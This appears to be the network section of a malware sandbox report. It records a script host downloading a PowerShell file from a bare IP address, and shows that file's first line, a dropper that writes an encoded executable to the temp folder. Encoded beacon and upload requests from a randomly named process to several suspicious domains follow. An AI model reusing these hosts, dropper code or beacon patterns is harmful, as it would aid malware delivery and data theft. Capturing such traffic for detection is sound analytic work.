Feb 18, 2025 08:16:25.108232021 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:26.604887009 CET | 52666 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:26.609961987 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:26.610028982 CET | 52666 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:27.624130964 CET | 52667 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:27.632276058 CET | 80 | 52667 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:27.632359982 CET | 52667 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:27.642092943 CET | 52667 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:27.647129059 CET | 80 | 52667 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:29.218359947 CET | 80 | 52667 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:29.218580008 CET | 80 | 52667 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:29.221357107 CET | 52667 | 80 | 192.168.2.4 | 47.83.1.90
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:14:34.721098900 CET | 53 | 57240 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:15:07.467345953 CET | 51348 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:15:07.484230995 CET | 53 | 51348 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:15:23.296438932 CET | 56853 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:15:23.425215006 CET | 53 | 56853 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:15:36.576271057 CET | 63198 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:15:36.587939978 CET | 53 | 63198 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:15:49.812748909 CET | 56885 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:15:49.824531078 CET | 53 | 56885 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:16:03.077060938 CET | 59505 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:16:03.191140890 CET | 53 | 59505 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:16:19.375844955 CET | 61177 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:16:19.394052029 CET | 53 | 61177 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 18, 2025 08:15:07.467345953 CET | 192.168.2.4 | 1.1.1.1 | 0x7937 | Standard query (0) | www.lucynoel6465.shop | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:23.296438932 CET | 192.168.2.4 | 1.1.1.1 | 0xf27d | Standard query (0) | www.travel-cure.sbs | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:36.576271057 CET | 192.168.2.4 | 1.1.1.1 | 0xdc0b | Standard query (0) | www.physicsbrain.xyz | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:49.812748909 CET | 192.168.2.4 | 1.1.1.1 | 0xb2ed | Standard query (0) | www.infiniteve.xyz | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:16:03.077060938 CET | 192.168.2.4 | 1.1.1.1 | 0xc46a | Standard query (0) | www.weilaishijie.xyz | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:16:19.375844955 CET | 192.168.2.4 | 1.1.1.1 | 0xdc90 | Standard query (0) | www.dqvcbn.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:07.484230995 CET | 1.1.1.1 | 192.168.2.4 | 0x7937 | No error (0) | www.lucynoel6465.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:23.425215006 CET | 1.1.1.1 | 192.168.2.4 | 0xf27d | No error (0) | www.travel-cure.sbs | | 199.59.243.160 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:36.587939978 CET | 1.1.1.1 | 192.168.2.4 | 0xdc0b | No error (0) | www.physicsbrain.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:36.587939978 CET | 1.1.1.1 | 192.168.2.4 | 0xdc0b | No error (0) | www.physicsbrain.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:15:49.824531078 CET | 1.1.1.1 | 192.168.2.4 | 0xb2ed | No error (0) | www.infiniteve.xyz | | 162.0.231.203 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:16:03.191140890 CET | 1.1.1.1 | 192.168.2.4 | 0xc46a | No error (0) | www.weilaishijie.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:16:03.191140890 CET | 1.1.1.1 | 192.168.2.4 | 0xc46a | No error (0) | www.weilaishijie.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:16:19.394052029 CET | 1.1.1.1 | 192.168.2.4 | 0xdc90 | No error (0) | www.dqvcbn.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
                                                                        • 196.251.92.64
                                                                        • www.lucynoel6465.shop
                                                                        • www.travel-cure.sbs
                                                                        • www.physicsbrain.xyz
                                                                        • www.infiniteve.xyz
                                                                        • www.weilaishijie.xyz
                                                                        • www.dqvcbn.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 196.251.92.64 | 80 | 6892 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:14:23.383867979 CET | 331 | OUT | GET /crypt/popo.ps1 HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 196.251.92.64
Connection: Keep-Alive
Feb 18, 2025 08:14:24.092175007 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 18 Feb 2025 07:14:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 18 Feb 2025 05:47:14 GMT
ETag: "86878-62e642c43d096"
Accept-Ranges: bytes
Content-Length: 551032
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Data Raw: [hex dump of the body omitted; decoded form follows]
Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("[TRUNCATED]
Feb 18, 2025 08:14:24.092207909 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.092230082 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.092236042 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.092237949 CET | 896 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218756914 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218781948 CET | 224 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218811989 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218830109 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218847990 CET | 1236 | IN | [base64-encoded payload chunk omitted]
Feb 18, 2025 08:14:24.218868017 CET | 672 | IN | [base64-encoded payload chunk omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 52381 | 104.21.16.1 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:15:07.511040926 CET | 572 | OUT | GET /9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.lucynoel6465.shop
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
Feb 18, 2025 08:15:08.250482082 CET | 776 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:08 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Avh9oG%2FGUuJNIk6FyMX5v4igg5uPyGtSmqokcByDkVEsaFhOp2B4HitzxqRiwXYsWV9akBw4X0sO0%2FoVGAi1O1OClzVow30sBGvHn%2F8NKtnvFqPqgGsAgnCSR5VRlCuTowlApyoWQ8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 913c39665fed72a1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Feb 18, 2025 08:15:08.250940084 CET | 567 | IN | Data Raw: [hex dump of the body omitted; decoded form follows]
Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 52479 | 199.59.243.160 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:15:23.448081017 CET | 837 | OUT | POST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 49 62 71 47 43 57 42 45 36 58 47 70 77 57 55 78 59 33 35 52 47 59 79 59 6a 74 72 66 31 4f 7a 6e 49 49 6c 49 30 4e 66 61 76 41 53 51 48 4c 76 30 70 49 4c 53 32 72 73 70 36 39 63 37 62 45 4e 6f 51 69 43 64 54 6b 30 61 2b 55 4b 67 52 73 50 57 42 4d 46 4b 48 6f 50 37 2f 5a 43 74 48 76 64 2b 39 43 6e 68 51 6c 63 44 2f 72 45 67 77 67 39 62 50 73 31 52 62 56 6b 50 75 68 62 53 45 4e 47 37 35 38 57 5a 39 75 37 4c 6a 42 43 47 36 75 63 42 34 4f 55 66 39 7a 53 48 44 38 79 6a 79 6c 4b 62 62 67 31 5a 4e 35 5a 39 33 64 73 74 71 45 71 6f 66 43 6a 46 51 3d 3d
                                                                        Data Ascii: JZfd=Um8zWM95iS0bqIbqGCWBE6XGpwWUxY35RGYyYjtrf1OznIIlI0NfavASQHLv0pILS2rsp69c7bENoQiCdTk0a+UKgRsPWBMFKHoP7/ZCtHvd+9CnhQlcD/rEgwg9bPs1RbVkPuhbSENG758WZ9u7LjBCG6ucB4OUf9zSHD8yjylKbbg1ZN5Z93dstqEqofCjFQ==
                                                                        Feb 18, 2025 08:15:23.924133062 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: f809613a-3212-44e0-a399-20520b573667
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=f809613a-3212-44e0-a399-20520b573667; expires=Tue, 18 Feb 2025 07:30:23 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:23.924149036 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjgwOTYxM2EtMzIxMi00NGUwLWEzOTktMjA1MjBiNTczNjY3IiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.4 | 52495 | 199.59.243.160 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:26.004981041 CET | 857 | OUT | POST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 6f 72 71 64 6c 43 42 47 61 58 48 6d 51 57 55 37 34 33 39 52 47 55 79 59 6d 64 37 66 48 61 7a 6e 70 34 6c 4a 31 4e 66 54 2f 41 53 61 6e 4c 51 37 4a 4a 48 53 32 32 54 70 34 70 63 37 66 73 4e 6f 51 53 43 64 67 63 33 41 4f 55 49 31 42 73 42 59 68 4d 46 4b 48 6f 50 37 37 34 5a 74 48 6e 64 39 4f 71 6e 67 31 52 66 4f 66 72 48 6e 77 67 39 66 50 73 78 52 62 55 44 50 73 56 78 53 47 6c 47 37 38 41 57 5a 73 75 34 42 6a 42 45 59 4b 76 50 4a 62 75 66 64 59 36 43 47 56 77 68 39 77 78 55 58 39 74 76 49 38 59 4f 76 33 35 66 77 74 4e 65 6c 63 2f 71 65 58 47 64 61 74 68 72 38 2f 4c 77 31 42 70 78 55 6e 38 53 36 31 41 3d
                                                                        Data Ascii: JZfd=Um8zWM95iS0bqorqdlCBGaXHmQWU7439RGUyYmd7fHaznp4lJ1NfT/ASanLQ7JJHS22Tp4pc7fsNoQSCdgc3AOUI1BsBYhMFKHoP774ZtHnd9Oqng1RfOfrHnwg9fPsxRbUDPsVxSGlG78AWZsu4BjBEYKvPJbufdY6CGVwh9wxUX9tvI8YOv35fwtNelc/qeXGdathr8/Lw1BpxUn8S61A=
                                                                        Feb 18, 2025 08:15:26.471092939 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: 0bb2488f-7b04-4dc7-9894-481b87228d4c
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=0bb2488f-7b04-4dc7-9894-481b87228d4c; expires=Tue, 18 Feb 2025 07:30:26 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:26.471110106 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGJiMjQ4OGYtN2IwNC00ZGM3LTk4OTQtNDgxYjg3MjI4ZDRjIiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.4 | 52511 | 199.59.243.160 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:28.554032087 CET | 10939 | OUT | POST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 6f 72 71 64 6c 43 42 47 61 58 48 6d 51 57 55 37 34 33 39 52 47 55 79 59 6d 64 37 66 48 69 7a 6e 62 77 6c 49 57 56 66 42 76 41 53 45 33 4c 52 37 4a 49 64 53 32 2f 61 70 34 6c 71 37 5a 6f 4e 70 7a 61 43 62 52 63 33 56 65 55 49 71 78 73 4d 57 42 4d 63 4b 45 41 4c 37 2f 63 5a 74 48 6e 64 39 4c 75 6e 6e 67 6c 66 4d 66 72 45 67 77 67 70 62 50 73 4a 52 66 35 38 50 73 52 4c 53 32 46 47 37 64 77 57 66 65 32 34 48 7a 42 47 5a 4b 75 49 4a 62 6a 48 64 59 4f 4f 47 56 73 50 39 79 74 55 48 4a 30 45 53 2f 35 59 79 6b 77 44 73 74 56 42 75 72 4c 48 52 57 36 6f 4d 2f 42 6b 73 50 37 37 79 79 41 41 4c 6d 34 76 6b 67 6f 79 61 54 76 74 61 72 61 53 39 4b 33 57 69 37 52 70 57 64 75 47 35 36 53 4c 58 6b 65 62 6c 54 61 62 58 33 4b 42 37 35 2b 58 45 36 39 58 2b 63 65 63 41 45 68 33 55 45 39 6b 4f 47 59 78 4b 76 79 33 48 78 54 51 64 77 73 36 74 4c 55 71 65 75 6f 45 39 67 6c 62 61 6f 6f 79 69 76 4c 54 62 41 6e 61 34 32 37 6d 62 79 2f 36 67 49 54 39 73 48 43 54 63 48 54 6a 73 [TRUNCATED]
                                                                        Data Ascii: JZfd=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 [TRUNCATED]
                                                                        Feb 18, 2025 08:15:29.004501104 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: bf9b5a06-0101-42d9-a713-e235a79da412
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=bf9b5a06-0101-42d9-a713-e235a79da412; expires=Tue, 18 Feb 2025 07:30:28 GMT; path=/
                                                                        Connection: close
